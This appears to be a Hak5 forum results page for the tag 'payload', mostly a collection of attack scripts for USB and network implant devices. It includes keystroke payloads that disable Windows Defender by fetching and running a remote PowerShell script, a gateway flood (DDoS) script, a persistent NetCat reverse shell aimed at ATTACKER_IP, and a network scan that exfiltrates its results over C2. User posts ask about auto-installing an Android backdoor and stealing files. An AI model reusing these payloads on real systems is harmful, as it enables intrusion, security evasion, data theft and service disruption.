Showing results for tags 'payload'.
Found 55 results

  1. GIve-Me-My-iP (GIMMP)

    This payload is used to force the SharkJack onto static LANs. Main Scenario - DHCP is disabled or not present on the LAN, only Static IP Devices. The Payload uses ARP-Scan to scan an array of subnets to determine if ANY devices are on those subnets. - If so, connect to the last known network with devices and set the IP of the SharkJack to the Subnet and Last Digits you assign in the payload. Enjoy.

    NOTE: This payload requires the Router/LAN to have ARP Scanning enabled. Some Routers/LANs do not have this feature enabled.

    The Code:

    #!/bin/bash
    #
    # Title: GIve-Me-My-iP! (GIMMP)
    # Author: REDD of Private-Locker
    # Version: 1.0
    #
    # Description: This payload will determine if DHCP is enabled
    # on the LAN. - If not, it will scan a List of Common Network
    # Subnets for any Static IP Devices using ARP-scan. Once a valid
    # IP is found. It will set the SharkJack to the subnet of the last
    # detected Network in the log file with the ending IP digits.
    #
    # LED SETUP (Magenta)       - Setting up Variables and environment
    # LED Yellow thru Magenta   - Waiting to be plugged in
    # LED Cyan thru Magenta     - Scanning Subnets for Static IP Devices
    # LED Green Blinking        - DHCP found
    # LED Green SOLID           - IP Address found and set to SharkJack
    # LED Red SOLID             - Payload failed, No IP addresses detected
    # LED FINISH (Green)        - Payload completed
    #

    # Ending IP digits of the SharkJack.
    SET_IP="250"
    # Source IP that the ARP-Scan will come from.
    FAKE_SRC="192.168.133.7"
    # Packet Rate for ARP-Scan.
    BANDWIDTH="100000"
    # Temp log file for output of script.
    TMP_LOG="temp.log"

    # Determine if SharkJack gets IP.
    while ! ifconfig eth0; do LED M SOLID; sleep .8; LED Y SOLID; sleep .2; done
    NETMODE DHCP_CLIENT;
    LED M SOLID;
    sleep 5;
    IP="$(ip route list dev eth0 | awk ' /^default/ {print $3}')"

    # Verify variable to compare SharkJack IP.
    VERIFY="^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$"

    function cleanup() {
      if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; fi
    }

    function scan_networks() {
      NETWORKS=(
        '192.168.0.0/24' '192.168.1.0/24' '192.168.2.0/24' '192.168.10.0/24' '192.168.100.0/24'
        '172.16.0.0/24' '172.16.1.0/24' '172.16.2.0/24' '172.16.10.0/24' '172.16.24.0/24'
        '10.0.0.0/24' '10.0.1.0/24' '10.0.2.0/24' '10.0.10.0/24'
        '10.10.0.0/24' '10.10.1.0/24' '10.10.2.0/24' '10.10.10.0/24'
        '10.100.0.0/24' '10.100.1.0/24' '10.100.2.0/24' '10.100.10.0/24'
      )
      for i in "${NETWORKS[@]}"; do
        LED M SOLID;
        arp-scan --arpspa $FAKE_SRC -g -B $BANDWIDTH -I eth0 ${i} >> $TMP_LOG
        LED Y SOLID; sleep .2;
      done
      LED M FAST;
      # Last responding host in the log, reduced to its first three octets.
      LAST_IP=$(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" $TMP_LOG | tail -1 | cut -d"." -f1-3)
      if [ "$LAST_IP" != "" ]; then
        # Build the address from LAST_IP (the detected subnet) plus the configured last octet.
        SHARKJACK_IP="${LAST_IP}.${SET_IP}"
        ifconfig eth0 ${SHARKJACK_IP}/24 up
        CURRENT_SUBNET="${LAST_IP}"
        CURRENT_GW=$(ip route list dev eth0 | awk ' /^default/ {print $3}')
        LED G SOLID;
      else
        # If no LAN detected, exit.
        LED R SOLID; exit 1;
      fi
    }

    # Start the script. If Valid IP, continue script. - If not, let's scan some networks!
    if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; else touch $TMP_LOG; fi
    if [[ "$IP" =~ $VERIFY ]]; then
      # Gateway found. Continuing script.
      LED G FAST; sleep 1;
    elif [ -z "$IP" ]; then
      # No Gateway found (Blank Gateway Variable)
      NETMODE TRANSPARENT;
      scan_networks;
    elif [ "$IP" == "172.16.24.1" ]; then
      # Added to detect if the SharkJack remains on the current Arming Mode IP.
      NETMODE TRANSPARENT;
      scan_networks;
    else
      # Exiting with exit code 1.
      LED R SOLID; exit 1;
    fi

    # Final Cleanup.
    cleanup;

    # Run your SCANs here.. OR ... if you have the Internet Tester payload backed up in SharkLib
    LED FINISH
    SHARKLIB="/root/payload/sharklib"
    # The library directory name contains a space, so the path is quoted wherever it is used.
    PAYLOAD="${SHARKLIB}/Internet Tester/payload.sh"
    if [ -f "$PAYLOAD" ]; then source "$PAYLOAD"; fi

    Changelog:
    1.1 - Initial Release
  2. REDD

    [TOOL] SharkLib

    SharkLib - SharkJack Quick Payload Library

    This Tool was created less than 24 hours after having a "SharkJack", I realized how much of a pain it is to swap back and forth between prior loaded Payloads. So after 7 hours of debugging, testing, and pulling my hair out. - I give to you "SharkLib". SharkLib allows you to Backup/Restore prior loaded Payloads, via SSH Terminal. No more needing to have to "go deploy another script", you can easily use C2 or any SSH Terminal Service to switch your desired payloads.

    Features:
      • Installs to Local System to allow ease of access of "SharkLib". (/usr/sbin)
      • Syncs on Exit to prevent data corruption in payloads.
      • Easy to use Menu Interface.
      • Switch payloads in seconds with SSH.

    I will post the Code in here, until Hak5 tells me what "category" this tool falls under in the GitHub Repo.

    The Code:

    #!/bin/bash
    #
    # Title: SharkLib
    # Author: REDD of Private-Locker
    # Version: 1.3
    #
    # This Script is to be ran on the Hak5 SharkJack itself. This Script
    # makes switching between local stored payloads quick and simple.
    #
    VERS=1.3
    LIB_DIR="/root/payload/sharklib"
    DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
    START_DIR="$DIR"
    INSTALL_DIR="/usr/sbin"
    EXEC_FILE="sharklib"
    PAYLOAD_DIR="/root/payload"
    PAYLOAD_FILE="$PAYLOAD_DIR/payload.sh"

    function install_sharklib() {
      if [[ "$DIR" != $INSTALL_DIR ]]; then
        if [ ! -f "$INSTALL_DIR/$EXEC_FILE" ]; then
          printf " -> Installing SharkLib into System for Easy Access.\n"
          sleep 1;
          cp -rf $0 $INSTALL_DIR/$EXEC_FILE
          printf " -> Fixing Permissions of $EXEC_FILE in $INSTALL_DIR.\n"
          sleep 1;
          chmod +x $INSTALL_DIR/$EXEC_FILE
        fi
      fi
    }

    function view_payload() {
      printf "\n";
      cat "$PAYLOAD_FILE";
      printf "\n";
      read -n 1 -s -r -p "Press any key to return to Menu..";
      sharklib_menu;
    }

    function remove_sharklib() {
      if [ -f "$INSTALL_DIR/$EXEC_FILE" ]; then
        printf "\n"
        printf "Removing SharkLib from local system.\n"
        rm -rf "$INSTALL_DIR/$EXEC_FILE";
        printf "Removing SharkLib Payload Library.\n"
        rm -rf "$LIB_DIR";
        printf "SharkLib has been fully removed.\n\n"
      fi
    }

    function free_space() {
      FREE_MEM="$(df -h $PWD | awk '/[0-9]%/{print $(NF-2)}')"
    }

    function header() {
      free_space;
      printf "\n"
      printf "O========================================O\n"
      printf "| SharkLib - SharkJack Quick Payload |\n"
      printf "| Library |\n"
      printf "O=O====================================O=O\n"
      printf " | %-29s |\n" "$SHARKLIB_TITLE"
      printf " O====================================O\n"
      printf " | Free Space: %-6s Vers: %-3s | \n" "$FREE_MEM" "$VERS"
      printf " O================================O \n"
      printf " -Huge Thanks goes to Hak5! \n"
      printf "\n"
    }

    function backup_payload() {
      clear;
      SHARKLIB_TITLE=" Backup Payloads"
      header;
      if [ -f "$PAYLOAD_FILE" ]; then
        printf "\n"
        printf " 1. Backup current payload to SharkLib\n"
        printf "\n"
        printf " 2. Return to Previous Menu.\n"
        printf "\n"
        printf " Select a Menu Item by # and press ENTER: "
        read BACKUP_INPUT
        printf "\n"
        if [ "$BACKUP_INPUT" = "1" ]; then
          printf " What would you want to call this Payload?: "
          read BACKUP_INPUT_1
          # The name typed here becomes a directory component below (including in rm -rf)
          # without any sanitising, so only use it from a trusted SSH session.
          if [[ "$BACKUP_INPUT_1" != "" ]]; then
            if [ ! -d "$LIB_DIR/$BACKUP_INPUT_1" ]; then
              mkdir -p "$LIB_DIR/$BACKUP_INPUT_1"
              cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh"
              printf " Created Payload directory named $BACKUP_INPUT_1\n"
              sleep 2; sharklib_menu;
            else
              printf " Removing Old Copy and using New Copy of $BACKUP_INPUT_1\n"
              rm -rf "$LIB_DIR/$BACKUP_INPUT_1"
              mkdir -p "$LIB_DIR/$BACKUP_INPUT_1"
              cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh"
              sleep 2; sharklib_menu;
            fi
          else
            if [ ! -d "$LIB_DIR/Payload" ]; then
              printf " Backing up Payload into Default Payload directory..\n"
              mkdir -p "$LIB_DIR/Payload"
              cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh"
              sleep 2; sharklib_menu;
            else
              printf " Removing Old Copy and using New Copy of $LIB_DIR/Payload\n"
              rm -rf "$LIB_DIR/Payload"
              mkdir -p "$LIB_DIR/Payload"
              cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh"
              sleep 2; sharklib_menu;
            fi
          fi
        elif [ "$BACKUP_INPUT" = "2" ]; then
          sharklib_menu;
        else
          backup_payload;
        fi
      else
        printf " No Payload in $PAYLOAD_DIR.\n"
      fi
    }

    function delete_payload() {
      DELETE_INPUT=NULL
      clear;
      SHARKLIB_TITLE=" Delete Payloads"
      header;
      cd "$LIB_DIR"
      DIR_CNT="NULL"
      DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l)
      declare -a DIRS
      i=1
      for d in */; do
        DIRS[i++]="${d%/}"
      done
      if [ "$DIR_CNT" -lt "1" ]; then
        printf " There are no Payloads to Delete. \n\n"
        printf " Returning to Previous Menu.\n"
        sleep 2; sharklib_menu;
      fi
      printf " There are ${#DIRS[@]} Payloads in SharkLib:\n"
      for((i=1;i<=${#DIRS[@]};i++)); do
        printf " %2d. %-20s\n" "$i" "${DIRS[i]}"
      done
      PAYLOAD_TOTAL=${#DIRS[@]}
      PLUS_QUIT=$((PAYLOAD_TOTAL+1))
      printf "\n"
      printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu."
      printf "\n"
      printf " Please choose a Payload by Number: "
      read DELETE_INPUT
      printf "\n"
      if [[ "$DELETE_INPUT" == "$PLUS_QUIT" ]]; then
        printf " Returning to Previous Menu.\n"
        sleep 2; sharklib_menu;
      elif [[ "$DELETE_INPUT" == "" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; delete_payload;
      elif ! [[ "$DELETE_INPUT" =~ ^[0-9]+$ ]]; then
        printf " Please Input a choice.\n"
        sleep 2; delete_payload;
      elif [[ "$DELETE_INPUT" == "0" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; delete_payload;
      elif [[ "$DELETE_INPUT" -gt "$PLUS_QUIT" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; delete_payload;
      elif [[ "$DELETE_INPUT" -le "$PLUS_QUIT" ]]; then
        printf " Deleting payload ${DIRS[$DELETE_INPUT]} from SharkJack. \n"
        rm -rf "$LIB_DIR/${DIRS[$DELETE_INPUT]}"
        cd "$START_DIR"
        sleep 2; sharklib_menu;
      else
        printf " Wrong Choice, going back to Previous Menu.\n"
        cd "$START_DIR"
        sleep 2; sharklib_menu;
      fi
    }

    function restore_payload() {
      LOAD_INPUT=NULL
      clear;
      SHARKLIB_TITLE=" Restore Payloads"
      header;
      cd "$LIB_DIR"
      DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l)
      declare -a DIRS
      i=1
      for d in */; do
        DIRS[i++]="${d%/}"
      done
      if [ "$DIR_CNT" -lt "1" ]; then
        printf " There are no Payloads to Restore. \n\n"
        printf " Returning to Previous Menu.\n"
        sleep 2; sharklib_menu;
      fi
      printf " There are ${#DIRS[@]} Payloads in SharkLib:\n"
      for((i=1;i<=${#DIRS[@]};i++)); do
        printf " %2d. %-20s\n" "$i" "${DIRS[i]}"
      done
      PAYLOAD_TOTAL=${#DIRS[@]}
      PLUS_QUIT=$((PAYLOAD_TOTAL+1))
      printf "\n"
      printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu."
      printf "\n"
      printf " Please choose a Payload by Number: "
      read LOAD_INPUT
      printf "\n"
      if [[ "$LOAD_INPUT" == "$PLUS_QUIT" ]]; then
        printf " Returning to Previous Menu.\n"
        sleep 2; sharklib_menu;
      elif [[ "$LOAD_INPUT" == "" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; restore_payload;
      elif ! [[ "$LOAD_INPUT" =~ ^[0-9]+$ ]]; then
        printf " Please Input a choice.\n"
        sleep 2; restore_payload;
      elif [[ "$LOAD_INPUT" == "0" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; restore_payload;
      elif [[ "$LOAD_INPUT" -gt "$PLUS_QUIT" ]]; then
        printf " Please Input a choice.\n"
        sleep 2; restore_payload;
      elif [[ "$LOAD_INPUT" -le "$PLUS_QUIT" ]]; then
        printf " Loading payload ${DIRS[$LOAD_INPUT]} to SharkJack. \n"
        cp -rf "$LIB_DIR/${DIRS[$LOAD_INPUT]}/payload.sh" "$PAYLOAD_FILE"
        cd "$START_DIR"
        sleep 2; sharklib_menu;
      else
        printf " Wrong Choice, going back to Previous Menu.\n"
        cd "$START_DIR"
        sleep 2; sharklib_menu;
      fi
    }

    function cleanup_ctrl {
      echo -en "\n -> Caught SIGINT! \n"
      printf " -> Cleaning up and Exiting..\n\n"
      sync
      sleep 1;
      exit $?
    }

    function exit_sharklib() {
      printf " -> Cleaning up and Exiting..\n\n"
      sync
      sleep 1;
      exit 0;
    }

    function sharklib_menu() {
      clear;
      trap cleanup_ctrl SIGINT
      trap cleanup_ctrl SIGTERM
      MENU_INPUT=NULL
      if [ ! -d "$LIB_DIR" ]; then
        printf " -> Creating SharkLib Payload Library directory.\n"
        mkdir -p "$LIB_DIR"
      fi
      cd "$LIB_DIR"
      SHARKLIB_TITLE=" By REDD"
      header;
      printf " 1. Backup Payload to SharkLib\n"
      printf " 2. Restore Payload from SharkLib\n"
      printf " 3. Delete Payload from SharkLib\n"
      printf "\n"
      printf " 4. View Current Payload on SharkJack\n"
      printf "\n"
      printf " 5. Exit\n"
      printf "\n"
      printf " Select a Menu Item by # and press ENTER: "
      read MENU_INPUT
      printf "\n"
      if ! [[ "$MENU_INPUT" =~ ^[0-9]+$ ]]; then
        sharklib_menu;
      elif [[ "$MENU_INPUT" = "0" ]]; then
        sharklib_menu;
      elif [[ "$MENU_INPUT" = "1" ]]; then
        backup_payload;
      elif [[ "$MENU_INPUT" = "2" ]]; then
        restore_payload;
      elif [[ "$MENU_INPUT" = "3" ]]; then
        delete_payload;
      elif [[ "$MENU_INPUT" = "4" ]]; then
        view_payload;
      elif [[ "$MENU_INPUT" = "5" ]]; then
        exit_sharklib;
      elif [[ "$MENU_INPUT" -ge "6" ]]; then
        sharklib_menu;
      elif [[ "$MENU_INPUT" == "" ]]; then
        sharklib_menu;
      else
        sharklib_menu;
      fi
    }

    if [ "$1" == "--install" ]; then
      install_sharklib;
      exit 0;
    elif [ "$1" == "--remove" ]; then
      remove_sharklib;
    else
      install_sharklib;
      sharklib_menu;
    fi

    Suggestions are always welcome! Huge Thanks to Hak5 for the wonderful gear!

    REDD (Ar1k88)
  3. Nmap Quickscan (Cleaned & C2 Enabled)

    This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, it scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)

    payload.sh

    #!/bin/bash
    # Title: Nmap Quickscan (Cleaned & C2 Enabled)
    # Author: REDD of Private-Locker
    # Version: 1.0
    #
    # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to.
    # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
    # It scans the local subnet for any online devices. - While also logging the Public IP of the
    # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
    #
    # Magenta w/ Yellow ........Waiting for Internet
    # Yellow flashing...........Scanning
    # Blue......................Exfiltrating to C2
    # Red.......................Failed C2/EXFIL/Scanning
    # Green.....................Finished

    # /etc/device.config only exists once the Shark Jack has been enrolled with Cloud C2.
    if [ -f "/etc/device.config" ]; then
      INITIALIZED=1
    else
      INITIALIZED=0
    fi

    LED SETUP
    NETMODE DHCP_CLIENT
    while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
    URL="http://www.google.com"
    while ! wget $URL -qO /dev/null; do sleep 1; done
    # Re-read the routing table until a default gateway shows up.
    GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
    while [ -z "$GET_GATEWAY" ]; do
      sleep 1
      GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
    done
    INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
    SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}')
    CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3)
    FIN_SUB="${CHK_SUB}.0/24"
    LED ATTACK;
    # Only scan when the gateway and our own address are on the same /24.
    if [ "$SUBNET" != "$FIN_SUB" ]; then
      LED R FAST; sleep 2; LED R SOLID;
    else
      # Fix for Timestamp Update
      ntpd -gq; sleep 1;
      # Define the loot paths before creating them.
      DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S')
      LOOT_DIR="/root/loot/nmap-diag"
      LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt"
      if [ ! -d "$LOOT_DIR" ]; then
        mkdir -p "$LOOT_DIR"
      fi
      if [ ! -f "$LOOT_FILE" ]; then
        touch "$LOOT_FILE"
      fi
      PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -)
      printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE"
      nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE"
      if [ -s "$LOOT_FILE" ]; then
        if [ "$INITIALIZED" == 1 ]; then
          if [ -z "$(pgrep cc-client)" ]; then
            C2CONNECT
            while ! pgrep cc-client; do LED B SOLID; sleep .2; LED G SOLID; sleep .8; done
          fi
          C2EXFIL STRING ${LOOT_FILE} Nmap Diagnostic for Network ${SUBNET}
          LED B VERYFAST; sleep .5;
        fi
        LED FINISH;
      else
        LED R SOLID; rm -rf "$LOOT_FILE";
      fi
    fi
  4. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  5. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (Rubber Ducky) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # Q WIN R Q STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; (Developer's Note - I personally do NOT own a Rubber Ducky. This script has just been adapted to Rubber Ducky format. If any issues, please comment or contact me.)
  6. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  7. Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... 😉) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! 
ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! 
led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon..
  8. Hey guys, newbie here. I was wondering if there is a way / payload so that if I save a backdoor.apk in the bash it auto-installs on an Android phone? I'm making an Android APK backdoor (RAT) and I'm trying to find a way to make it auto-install and run with the bash without internet. If not, is there a way with the USB Rubber Ducky? Thanks in advance. Sorry for my English :/
  9. I have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if the code for that payload would work on an OSX system and, if it does not, what changes would be needed for it to work. Also, I have tried to use the same payload for JPGs and photos but it does not seem to work. Is there a way for that to succeed, or is it not possible? I would really appreciate it, since that is the task I have been given. Thanks
  11. Hi, just wondering if anyone could give me some guidance. I work in the security team at a company, and I want to roll out a SIEM agent to developers' laptops. I need to install this agent as quickly as possible on Linux/Mac boxes whilst they are locked or unlocked (devs don't want to do it themselves and are pretty reluctant to hand over their laptops). The agent is basically a bash script install... chmod +x & ./<filename>. I think I could use my Bash Bunny to quickly walk over to the devs' laptops, put the USB in... and job done.... So my question is: if I run the install via a payload, will it install on the Bash Bunny OS or the laptop I've plugged it into? Or will I have to copy it to the remote OS and use a series of key presses to run it? Any advice would be great. Thanks
